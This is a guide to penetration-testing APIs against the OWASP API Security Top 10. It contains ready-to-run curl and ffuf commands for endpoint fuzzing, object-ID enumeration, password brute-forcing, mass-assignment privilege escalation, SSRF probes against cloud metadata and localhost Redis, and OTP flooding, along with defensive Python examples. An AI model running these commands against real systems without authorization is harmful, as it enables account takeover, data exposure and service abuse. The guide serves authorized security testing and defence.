
Testing API Security with OWASP Top 10

When to Use

  • During authorized API penetration testing engagements
  • When assessing REST, GraphQL, or gRPC APIs for security vulnerabilities
  • Before deploying new API endpoints to production environments
  • When reviewing API security posture against the OWASP API Security Top 10 (2023)
  • For validating API gateway security controls and rate limiting effectiveness

Prerequisites

  • Authorization: Written scope document covering all API endpoints to be tested
  • Burp Suite Professional: For intercepting and modifying API requests
  • Postman: For organizing and executing API test collections
  • ffuf: For API endpoint and parameter fuzzing
  • curl/httpie: Command-line HTTP clients for manual testing
  • API documentation: Swagger/OpenAPI spec, GraphQL schema, or API docs
  • jq: JSON processor for parsing API responses (`apt install jq`)

Workflow

Step 1: Discover and Map API Endpoints

Enumerate all available API endpoints and understand the API surface.

```bash
# If OpenAPI/Swagger spec is available, download it

# Fuzz for API endpoints
ffuf -u "https://api.target.example.com/api/v1/FUZZ" \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,401,403,405 \
  -fc 404 \
  -H "Content-Type: application/json" \
  -o api-enum.json -of json

# Fuzz for API versions
for v in v1 v2 v3 v4 beta internal admin; do
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://api.target.example.com/api/$v/users")
  echo "$v: $status"
done

# Check for GraphQL endpoint
for path in graphql graphiql playground query gql; do
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST -H "Content-Type: application/json" \
    -d '{"query":"{__typename}"}' \
    "https://api.target.example.com/$path")
  echo "$path: $status"
done
```

Step 2: Test API1 - Broken Object Level Authorization (BOLA)

Test whether users can access objects belonging to other users by manipulating IDs.

```bash
# Authenticate as User A and get their resources
TOKEN_A="Bearer eyJhbGciOiJIUzI1NiIs..."
curl -s -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/users/101/orders" | jq .

# Try accessing User B's resources with User A's token
curl -s -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/users/102/orders" | jq .

# Fuzz object IDs with Burp Intruder or ffuf
ffuf -u "https://api.target.example.com/api/v1/orders/FUZZ" \
  -w <(seq 1 1000) \
  -H "Authorization: $TOKEN_A" \
  -mc 200 -t 10 -rate 50

# Test IDOR with different ID formats
# Numeric: /users/102
# UUID:    /users/550e8400-e29b-41d4-a716-446655440000
# Encoded: /users/MTAy (base64)
```
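As an added, defender-side illustration (not code from the original page), the handler pattern the BOLA tests above probe: a lookup keyed only by object ID beside one that also checks ownership, plus a decoder for the three ID formats listed. The order store and the user IDs 101/102 are constructed sample data.

```python
import base64
import uuid

# Added example: object-level authorization for the order endpoints tested above.
# ORDERS and the user IDs 101/102 are constructed sample data.
ORDERS = {
    1: {"owner": 101, "total": 42.00},
    2: {"owner": 102, "total": 13.37},
    3: {"owner": 102, "total": 99.99},
}


def parse_object_id(raw):
    """Accept the ID formats listed above. Encoding is not a control: "MTAy"
    is just 102, so the ownership check must run on the decoded value."""
    if raw.isdigit():
        return int(raw)
    try:
        return int(base64.b64decode(raw, validate=True).decode())
    except ValueError:  # not base64, or base64 that is not a number
        pass
    return uuid.UUID(raw)  # raises ValueError for anything else


def get_order_vulnerable(order_id, caller_id):
    """Authentication only: any valid token can read any order (BOLA)."""
    if caller_id is None:
        return 401, None
    order = ORDERS.get(order_id)
    return (200, order) if order else (404, None)


def get_order_hardened(order_id, caller_id):
    """Authentication plus an ownership check on the loaded object."""
    if caller_id is None:
        return 401, None
    order = ORDERS.get(order_id)
    if order is None:
        return 404, None
    if order["owner"] != caller_id:
        # 403 makes the finding explicit; answering 404 here instead would
        # additionally hide whether the foreign ID exists at all.
        return 403, None
    return 200, order


def list_orders_hardened(user_id, caller_id):
    """GET /users/{uid}/orders: the {uid} in the path is client input, so it is
    compared with the caller's identity rather than used as the filter."""
    if caller_id is None:
        return 401, None
    if user_id != caller_id:
        return 403, None
    return 200, sorted(oid for oid, o in ORDERS.items() if o["owner"] == caller_id)
```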

Step 3: Test API2 - Broken Authentication

Assess authentication mechanisms for weaknesses.

```bash
# Test for missing authentication

# Test JWT token vulnerabilities
# Decode JWT without verification
echo "eyJhbGciOiJIUzI1NiIs..." | cut -d. -f2 | base64 -d 2>/dev/null | jq .

# Test "alg: none" attack
# Header: {"alg":"none","typ":"JWT"}
# Create unsigned token with modified claims

# Test brute-force protection on login
ffuf -u "https://api.target.example.com/api/v1/auth/login" \
  -X POST -H "Content-Type: application/json" \
  -d '{"email":"admin@target.com","password":"FUZZ"}' \
  -w /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt \
  -mc 200 -t 5 -rate 10

# Test password reset flow
curl -s -X POST "https://api.target.example.com/api/v1/auth/reset" \
  -H "Content-Type: application/json" \
  -d '{"email":"victim@target.com"}'
# Check if token is in response body instead of email only
```

Step 4: Test API3 - Broken Object Property Level Authorization

Test for excessive data exposure and mass assignment vulnerabilities.

```bash
# Check for excessive data in responses
curl -s -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/users/101" | jq .
# Look for: password hashes, SSNs, internal IDs, admin flags, PII

# Test mass assignment - try adding admin properties
curl -s -X PUT \
  -H "Authorization: $TOKEN_A" \
  -H "Content-Type: application/json" \
  -d '{"name":"Test User","role":"admin","is_admin":true}' \
  "https://api.target.example.com/api/v1/users/101" | jq .

# Test with PATCH method
curl -s -X PATCH \
  -H "Authorization: $TOKEN_A" \
  -H "Content-Type: application/json" \
  -d '{"role":"admin","balance":999999}' \
  "https://api.target.example.com/api/v1/users/101" | jq .

# Check if filtering parameters expose more data
curl -s -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/users/101?fields=all" | jq .
curl -s -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/users/101?include=password,ssn" | jq .
```
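Added example, not part of the original page: the property-level controls the mass-assignment and fields=/include= tests above look for, a write allowlist for PUT/PATCH bodies and an explicit response serializer. Field names and the USER_101 record are constructed for the demo.

```python
# Added example: property-level controls behind PUT/PATCH and GET /users/{id}.
# The field lists and the USER_101 record are constructed for this demo.
WRITABLE_BY_USER = {"name", "email", "avatar_url"}
PUBLIC_FIELDS = {"id", "name", "avatar_url"}
OWNER_FIELDS = PUBLIC_FIELDS | {"email", "role"}

USER_101 = {
    "id": 101, "name": "Alice", "email": "alice@example.com", "role": "user",
    "is_admin": False, "balance": 10.0,
    "password_hash": "$2b$12$placeholder", "ssn": "000-00-0000",
}


def apply_update(record, body, caller_is_admin=False):
    """Bind the body through an allowlist instead of merging it into the model.
    Privileged or unknown keys ("role", "is_admin", "balance") fail the whole
    request with 400 and are named, so the attempt is visible in logs."""
    allowed = WRITABLE_BY_USER | ({"role"} if caller_is_admin else set())
    rejected = sorted(set(body) - allowed)
    if rejected:
        return 400, {"error": "unknown or read-only fields", "fields": rejected}
    return 200, {**record, **body}


def serialize(record, viewer_is_owner, include=None):
    """Shape the response explicitly rather than dumping the stored row.
    A client include=/fields= list can only narrow the allowed set, never
    widen it, so include=password,ssn and fields=all yield nothing extra."""
    allowed = OWNER_FIELDS if viewer_is_owner else PUBLIC_FIELDS
    if include:
        allowed = allowed & set(include.split(","))
    return {k: record[k] for k in sorted(allowed) if k in record}
```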

Step 5: Test API4/API6 - Rate Limiting and Unrestricted Access to Sensitive Flows

Verify rate limiting and resource consumption controls.

```bash
# Test rate limiting on authentication endpoint
for i in $(seq 1 100); do
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST -H "Content-Type: application/json" \
    -d '{"email":"test@test.com","password":"wrong"}' \
    "https://api.target.example.com/api/v1/auth/login")
  echo "Attempt $i: $status"
  if [ "$status" == "429" ]; then
    echo "Rate limited at attempt $i"
    break
  fi
done

# Test for unrestricted resource consumption
# Large pagination
curl -s -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/users?limit=100000&offset=0" | jq '. | length'

# GraphQL depth/complexity attack
curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: $TOKEN_A" \
  -d '{"query":"{ users { friends { friends { friends { friends { name } } } } } }"}' \
  "https://api.target.example.com/graphql"

# Test SMS/email flooding via OTP endpoint
for i in $(seq 1 20); do
  curl -s -X POST -H "Content-Type: application/json" \
    -d '{"phone":"+1234567890"}' \
    "https://api.target.example.com/api/v1/auth/send-otp"
done
```
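Added example (not from the original page) of two controls this step exercises: a GraphQL depth limit that rejects the nested friends query before any resolver runs, and a login rate limiter that counts both the source IP and the target account. MAX_DEPTH, limit and window are constructed values, not a recommendation for any particular API.

```python
import time
from collections import deque

# Added example: a GraphQL depth limit and a login rate limiter.
# MAX_DEPTH, limit and window are constructed demo values.
MAX_DEPTH = 4


def query_depth(query):
    """Deepest selection-set nesting in a GraphQL document, counting braces
    outside string literals: '{ users { friends { name } } }' has depth 3."""
    depth = deepest = 0
    in_str = escaped = False
    for c in query:
        if in_str:
            if escaped:
                escaped = False
            elif c == "\\":
                escaped = True
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif c == "}":
            depth -= 1
    return deepest


def check_graphql(query):
    """Reject before any resolver runs, so the nested friends query above
    never reaches the database. Returns an HTTP status."""
    return 400 if query_depth(query) > MAX_DEPTH else 200


class LoginLimiter:
    """Sliding-window counter kept per source IP and per target account.
    Counting only one of them is bypassable: per-IP by rotating addresses,
    per-account by spraying many accounts."""

    def __init__(self, limit=5, window=60.0):
        self.limit, self.window = limit, window
        self.hits = {}

    def allow(self, ip, account, now=None):
        """Return 200 or 429 for one login attempt at time `now`."""
        now = time.monotonic() if now is None else now
        keys = (("ip", ip), ("acct", account))
        for key in keys:
            q = self.hits.setdefault(key, deque())
            while q and now - q[0] >= self.window:
                q.popleft()
        if any(len(self.hits[k]) >= self.limit for k in keys):
            return 429
        for key in keys:
            self.hits[key].append(now)
        return 200
```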

Step 6: Test API5 - Broken Function Level Authorization

Check for privilege escalation through administrative endpoints.

```bash
# Test admin endpoints with regular user token
ADMIN_ENDPOINTS=(
  "/api/v1/admin/users"
  "/api/v1/admin/settings"
  "/api/v1/admin/logs"
  "/api/v1/internal/config"
  "/api/v1/users?role=admin"
  "/api/v1/admin/export"
)
for endpoint in "${ADMIN_ENDPOINTS[@]}"; do
  for method in GET POST PUT DELETE; do
    status=$(curl -s -o /dev/null -w "%{http_code}" \
      -X "$method" \
      -H "Authorization: $TOKEN_A" \
      -H "Content-Type: application/json" \
      "https://api.target.example.com$endpoint")
    if [ "$status" != "403" ] && [ "$status" != "401" ] && [ "$status" != "404" ]; then
      echo "POTENTIAL ISSUE: $method $endpoint returned $status"
    fi
  done
done

# Test HTTP method switching
# If GET /admin/users returns 403, try:
curl -s -X POST -H "Authorization: $TOKEN_A" \
  "https://api.target.example.com/api/v1/admin/users"
```
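An added example, not from the original page, of why the method-switching test matters: a role check attached to the GET handler alone beside a deny-by-default policy applied to the normalised path for every method. Prefixes and roles are constructed demo values.

```python
import posixpath

# Added example: function-level authorization evaluated on the path, before
# dispatch and independent of HTTP method. Prefixes and roles are constructed.
ADMIN_PREFIXES = ("/api/v1/admin", "/api/v1/internal")


def is_admin_path(path):
    """Normalise before matching so /api/v1/admin/../admin/users,
    //api/v1/admin/users, /API/v1/admin/users or a trailing query string
    cannot dodge the prefix comparison."""
    norm = "/" + posixpath.normpath(path.split("?", 1)[0]).lower().lstrip("/")
    return any(norm == p or norm.startswith(p + "/") for p in ADMIN_PREFIXES)


def route_vulnerable(method, path, token_role):
    """Role check bolted onto the GET handler only: POST/PUT/DELETE on the same
    path fall through to a generic handler that never consults the role."""
    if path.startswith("/api/v1/admin/") and method == "GET":
        return 200 if token_role == "admin" else 403
    return 200


def route_hardened(method, path, token_role):
    """Deny-by-default policy evaluated for every method. The role comes from
    the verified token, never from the request (?role=admin is just a filter)."""
    if is_admin_path(path) and token_role != "admin":
        return 403
    return 200
```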

Step 7: Test API7-API10 - SSRF, Misconfiguration, Inventory, and Unsafe Consumption

API7: Server-Side Request Forgery

```bash
curl -s -X POST -H "Authorization: $TOKEN_A" \
  -H "Content-Type: application/json" \
  -d '{"url":"http://169.254.169.254/latest/meta-data/"}' \
  "https://api.target.example.com/api/v1/fetch-url"

curl -s -X POST -H "Authorization: $TOKEN_A" \
  -H "Content-Type: application/json" \
  -d '{"webhook_url":"http://127.0.0.1:6379/"}' \
  "https://api.target.example.com/api/v1/webhooks"
```

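Added example (not the page's own code) of the outbound-URL validation the fetch-url and webhook_url tests above probe, covering the metadata and loopback addresses used in them. The scheme/port allowlist is constructed demo policy, and the resolver is injectable so the check can run offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example: validation of a caller-supplied outbound URL (fetch-url,
# webhook_url). Scheme/port allowlists are constructed demo policy; `resolve`
# is injectable so the offline test can stand in for DNS.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_blocked_address(ip):
    """Loopback (127.0.0.1:6379), link-local (169.254.169.254 metadata),
    RFC 1918/ULA, multicast, unspecified and reserved ranges are off limits.
    IPv4-mapped IPv6 (::ffff:169.254.169.254) is unwrapped first."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_multicast or ip.is_unspecified or ip.is_reserved)


def validate_outbound_url(url, resolve=socket.getaddrinfo):
    """Return (ok, reason). Every resolved address is checked, not only the
    first, and the caller must connect to the address that was checked (or
    re-check at connect time) to avoid a DNS-rebinding race."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port  # .port raises on junk
    except ValueError:
        return False, "unparseable url"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in url"
    if not host:
        return False, "missing host"
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = {ipaddress.ip_address(host)}
    except ValueError:  # a hostname, not an IP literal: resolve it
        try:
            addrs = {ipaddress.ip_address(ai[4][0]) for ai in resolve(host, port)}
        except (OSError, ValueError):
            return False, "dns resolution failed"
    for ip in sorted(addrs, key=str):
        if is_blocked_address(ip):
            return False, f"resolves to blocked address {ip}"
    return True, "ok"
```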
API8: Security Misconfiguration

```bash
# Check CORS policy
curl -s -I -H "Origin: https://evil.example.com" \
  "https://api.target.example.com/api/v1/users" | grep -i "access-control"

# Check for verbose error messages (deliberately malformed JSON body)
curl -s -X POST -H "Content-Type: application/json" \
  -d '{"invalid": "data' \
  "https://api.target.example.com/api/v1/users"

# Check security headers
curl -s -I "https://api.target.example.com/api/v1/health" | grep -iE \
  "(x-frame|x-content|strict-transport|content-security|x-xss)"
```

API9: Improper Inventory Management

```bash
# Test deprecated API versions
for v in v0 v1 v2 v3; do
  curl -s -o /dev/null -w "$v: %{http_code}\n" \
    "https://api.target.example.com/api/$v/users"
done
```

API10: Unsafe Consumption of APIs

  • Test if the API blindly trusts third-party data
  • Check webhook/callback implementations for injection

Key Concepts

| Concept | Description |
| --- | --- |
| BOLA (API1) | Broken Object Level Authorization - accessing objects belonging to other users |
| Broken Authentication (API2) | Weak authentication mechanisms allowing credential stuffing or token manipulation |
| BOPLA (API3) | Broken Object Property Level Authorization - excessive data exposure or mass assignment |
| Unrestricted Resource Consumption (API4) | Missing rate limiting enabling DoS or brute-force attacks |
| Broken Function Level Auth (API5) | Regular users accessing admin-level API functions |
| SSRF (API7) | Server-Side Request Forgery through API parameters accepting URLs |
| Security Misconfiguration (API8) | Missing security headers, verbose errors, permissive CORS |
| Improper Inventory (API9) | Undocumented, deprecated, or shadow API endpoints left exposed |

Tools & Systems

| Tool | Purpose |
| --- | --- |
| Burp Suite Professional | API interception, scanning, and manual testing |
| Postman | API collection management and automated test execution |
| ffuf | API endpoint and parameter fuzzing |
| Kiterunner | API endpoint discovery using common API path patterns |
| jwt_tool | JWT token analysis, manipulation, and attack automation |
| GraphQL Voyager | GraphQL schema visualization and introspection analysis |
| Arjun | HTTP parameter discovery for API endpoints |

Common Scenarios

Scenario 1: BOLA in E-commerce API

User A can access User B's order details by changing the order ID in `/api/v1/orders/{id}`. The API only checks authentication but not authorization on the object level.

Scenario 2: Mass Assignment on User Profile

The user update endpoint accepts a `role` field in the JSON body. By adding `"role":"admin"` to a profile update request, a regular user escalates to administrator privileges.

Scenario 3: Deprecated API Version Bypass

The `/api/v2/users` endpoint has proper rate limiting, but `/api/v1/users` (still active) has no rate limiting. Attackers use the old version to brute-force credentials.

Scenario 4: GraphQL Introspection Data Leak

GraphQL introspection is enabled in production, exposing the entire schema including internal queries, mutations, and sensitive field names that are not used in the frontend.

Output Format

```
API Security Assessment Report

Target: api.target.example.com
API Type: REST (OpenAPI 3.0)
Assessment Date: 2024-01-15

OWASP API Security Top 10 (2023) Coverage

| Risk | Status | Severity | Details |
| --- | --- | --- | --- |
| API1: BOLA | VULNERABLE | Critical | /api/v1/orders/{id} - IDOR confirmed |
| API2: Broken Auth | VULNERABLE | High | No rate limit on /auth/login |
| API3: BOPLA | VULNERABLE | High | User role modifiable via mass assignment |
| API4: Resource Consumption | VULNERABLE | Medium | No pagination limit enforced |
| API5: Function Level Auth | PASS | - | Admin endpoints properly restricted |
| API6: Unrestricted Sensitive Flows | VULNERABLE | Medium | OTP endpoint lacks rate limiting |
| API7: SSRF | PASS | - | URL parameters properly validated |
| API8: Misconfiguration | VULNERABLE | Medium | Verbose stack traces in error responses |
| API9: Improper Inventory | VULNERABLE | Low | API v1 still accessible without docs |
| API10: Unsafe Consumption | NOT TESTED | - | No third-party API integrations found |

Critical Finding: BOLA on Orders API

Authenticated users can access any order by iterating order IDs.
Tested range: 1-1000, 847 valid orders accessible.
PII exposure: names, addresses, payment details.
```